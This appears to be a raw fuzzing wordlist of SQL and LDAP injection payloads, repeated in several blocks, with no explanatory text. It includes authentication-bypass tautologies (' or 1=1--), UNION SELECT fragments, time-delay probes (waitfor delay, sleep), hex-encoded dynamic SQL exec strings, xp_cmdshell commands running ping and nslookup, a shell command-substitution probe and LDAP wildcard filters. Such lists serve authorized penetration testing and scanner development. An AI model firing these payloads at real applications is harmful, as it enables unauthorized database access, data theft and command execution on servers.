 or 3=3 --
' or 3=3
"a"" or 3=3--"
a' or 3=3--
*/*
//*
//
/
x' or 1=1 or 'x'='y
' or ''='
&
%26
' or 1=1 or ''='
!
%21
%29
)
%28
(
%2A%28%7C%28objectclass%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(mail=*))
%2A%7C
*|
%7C
|
(sqlattempt2)
 or 3=3 --
' or 3=3
"a"" or 3=3--"
a' or 3=3--
*/*
//*
//
/
x' or 1=1 or 'x'='y
' or ''='
&
%26
' or 1=1 or ''='
!
%21
%29
)
%28
(
%2A%28%7C%28objectclass%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(mail=*))
%2A%7C
*|
%7C
|
(sqlattempt2)
 or 3=3 --
' or 3=3
"a"" or 3=3--"
a' or 3=3--
*/*
//*
//
/
x' or 1=1 or 'x'='y
' or ''='
' or 1=1 or ''='
%21
!
%26
&
%29
)
%28
(
%2A%28%7C%28objectclass%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(mail=*))
%2A%7C
*|
%7C
|
(sqlattempt2)
 or 3=3 --
' or 3=3
"a"" or 3=3--"
a' or 3=3--
*/*
//*
//
/
x' or 1=1 or 'x'='y
' or ''='
' or 1=1 or ''='
%21
!
%26
&
%29
)
%28
(
%2A%28%7C%28objectclass%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(mail=*))
%2A%7C
*|
%7C
|
(sqlattempt2)
'sqlattempt1
&apos;%20OR
char%4039%41%2b%40SELECT
%20'sleep%2050'
%20$(sleep%2050)
%27%20or%201=1
'%20or%201=1
<>"'%;)(&+
tz_offset
to_timestamp_tz
1;SELECT%20*
'||UTL_HTTP.REQUEST
' or (EXISTS)
' (select top 1
' UNION ALL SELECT
' UNION SELECT
\x27UNION SELECT
--sp_password
t'exec master..xp_cmdshell 'nslookup www.google.com'--
'; exec xp_regread
'; exec master..xp_cmdshell
exec sp
exec xp
' or user like '%
' or uid like '%
' or userid like '%
' or uname like '%
' or username like '%
bfilename
handler
like
replace
truncate
having
distinct
update
delete
desc
asc
order by
limit
procedure
or
as
insert
select
PRINT @@variable
PRINT
,@variable
@variable
'sqlattempt1
&apos;%20OR
'hi' or 'x'='x';
char%4039%41%2b%40SELECT
%20'sleep%2050'
%20$(sleep%2050)
%27%20or%201=1
'%20or%201=1
<>"'%;)(&+
tz_offset
to_timestamp_tz
1;SELECT%20*
'||UTL_HTTP.REQUEST
' or (EXISTS)
' (select top 1
' UNION ALL SELECT
' UNION SELECT
\x27UNION SELECT
--sp_password
t'exec master..xp_cmdshell 'nslookup www.google.com'--
'; exec xp_regread
'; exec master..xp_cmdshell
exec sp
exec xp
' or user like '%
' or uid like '%
' or userid like '%
' or uname like '%
' or username like '%
bfilename
handler
like
replace
truncate
having
distinct
update
delete
desc
asc
order by
limit
procedure
or
as
insert
select
PRINT @@variable
PRINT
,@variable
@variable
'sqlattempt1
&apos;%20OR
'hi' or 'x'='x';
char%4039%41%2b%40SELECT
%20'sleep%2050'
%20$(sleep%2050)
%27%20or%201=1
'%20or%201=1
<>"'%;)(&+
tz_offset
to_timestamp_tz
1;SELECT%20*
'||UTL_HTTP.REQUEST
' or (EXISTS)
' (select top 1
' UNION ALL SELECT
' UNION SELECT
\x27UNION SELECT
--sp_password
t'exec master..xp_cmdshell 'nslookup www.google.com'--
'; exec xp_regread
'; exec master..xp_cmdshell
exec sp
exec xp
' or user like '%
' or uid like '%
' or userid like '%
' or uname like '%
' or username like '%
bfilename
handler
like
replace
truncate
having
distinct
update
delete
desc
asc
order by
limit
procedure
or
as
insert
select
PRINT @@variable
PRINT
,@variable
@variable
'sqlattempt1
&apos;%20OR
'hi' or 'x'='x';
char%4039%41%2b%40SELECT
%20'sleep%2050'
%20$(sleep%2050)
%27%20or%201=1
'%20or%201=1
<>"'%;)(&+
tz_offset
to_timestamp_tz
1;SELECT%20*
'||UTL_HTTP.REQUEST
' or (EXISTS)
' (select top 1
' UNION ALL SELECT
' UNION SELECT
\x27UNION SELECT
--sp_password
t'exec master..xp_cmdshell 'nslookup www.google.com'--
'; exec xp_regread
'; exec master..xp_cmdshell
exec sp
exec xp
' or user like '%
' or uid like '%
' or userid like '%
' or uname like '%
' or username like '%
bfilename
handler
like
replace
truncate
having
distinct
update
delete
desc
asc
order by
limit
procedure
or
as
insert
select
PRINT @@variable
PRINT
,@variable
@variable
"hi"") or (""a""=""a"
hi' or 'a'='a
'hi' or 'x'='x';
hi') or ('a'='a
hi' or 1=1 --
hi or 1=1 --"
hi or a=a
') or ('a'='a
or 1=1 or ""=
) or (a=a
' or a=a--
or%201=1 --
' or 1=1 or ''='
or%201=1
or a=a
' or 1 --'
or 1=1--
' or '1'='1'--
or 0=0 #"
" or 1=1--
' or 1=1--
' or 0=0 #
or 0=0 --
or 0=0 #
" or 0=0 --
' or 0=0 --
0 or 1=1
')%20or%20('x'='x
%20or%20x=x
'%20or%20'x'='x
'%20or%20''='
'
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
23 OR 1=1
x' OR full_name LIKE '%Bob%
x' AND members.email IS NULL; --
x' AND 1=(SELECT COUNT(*) FROM tabname); --
anything' OR 'x'='x
x' AND email IS NULL; --
x' AND userid IS NULL; --
 or 1=1 --
' or 1=1
?
a'
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
1 waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1 or 1=1
"hi"") or (""a""=""a"
hi' or 'a'='a
a' or 'a' = 'a
hi') or ('a'='a
hi' or 1=1 --
hi or 1=1 --"
hi or a=a
') or ('a'='a
or 1=1 or ""=
) or (a=a
' or a=a--
or%201=1 --
' or 1=1 or ''='
or a=a
or%201=1
' or 1 --'
or 1=1--
' or '1'='1'--
or 0=0 #"
" or 1=1--
' or 1=1--
' or 0=0 #
or 0=0 --
or 0=0 #
" or 0=0 --
' or 0=0 --
0 or 1=1
')%20or%20('x'='x
%20or%20x=x
'%20or%20'x'='x
'%20or%20''='
'
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
23 OR 1=1
x' OR full_name LIKE '%Bob%
x' AND members.email IS NULL; --
x' AND 1=(SELECT COUNT(*) FROM tabname); --
anything' OR 'x'='x
x' AND email IS NULL; --
x' AND userid IS NULL; --
 or 1=1 --
' or 1=1
?
a'
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
1 waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1 or 1=1
a' or 'a' = 'a
"hi"") or (""a""=""a"
hi' or 'a'='a
hi') or ('a'='a
hi' or 1=1 --
hi or 1=1 --"
hi or a=a
) or (a=a
') or ('a'='a
or 1=1 or ""=
or a=a
' or a=a--
' or 1=1 or ''='
or%201=1 --
or%201=1
' or 1 --'
or 1=1--
' or '1'='1'--
" or 1=1--
or 0=0 #"
' or 0=0 #
' or 1=1--
or 0=0 #
or 0=0 --
" or 0=0 --
' or 0=0 --
0 or 1=1
')%20or%20('x'='x
%20or%20x=x
'%20or%20'x'='x
'%20or%20''='
'
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
23 OR 1=1
x' OR full_name LIKE '%Bob%
x' AND members.email IS NULL; --
x' AND 1=(SELECT COUNT(*) FROM tabname); --
anything' OR 'x'='x
x' AND email IS NULL; --
x' AND userid IS NULL; --
 or 1=1 --
' or 1=1
?
a'
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
1 waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1 or 1=1
a' or 'a' = 'a
"hi"") or (""a""=""a"
hi') or ('a'='a
hi' or 'a'='a
hi' or 1=1 --
hi or 1=1 --"
hi or a=a
) or (a=a
') or ('a'='a
or 1=1 or ""=
or a=a
' or a=a--
' or 1=1 or ''='
or%201=1 --
or%201=1
' or 1 --'
or 1=1--
' or '1'='1'--
" or 1=1--
or 0=0 #"
' or 0=0 #
' or 1=1--
or 0=0 #
or 0=0 --
" or 0=0 --
' or 0=0 --
0 or 1=1
')%20or%20('x'='x
%20or%20x=x
'%20or%20'x'='x
'%20or%20''='
'
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
23 OR 1=1
x' OR full_name LIKE '%Bob%
x' AND members.email IS NULL; --
x' AND 1=(SELECT COUNT(*) FROM tabname); --
anything' OR 'x'='x
x' AND email IS NULL; --
x' AND userid IS NULL; --
 or 1=1 --
' or 1=1
?
a'
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
1 waitfor delay '0:0:10'--
a' waitfor delay '0:0:10'--
1 or 1=1
a' or 'a' = 'a
or a = a
"a"" or 1=1--"
a' or 1=1--
'
or a = a
"a"" or 1=1--"
a' or 1=1--
'
or a = a
"a"" or 1=1--"
a' or 1=1--
'
or a = a
"a"" or 1=1--"
a' or 1=1--
'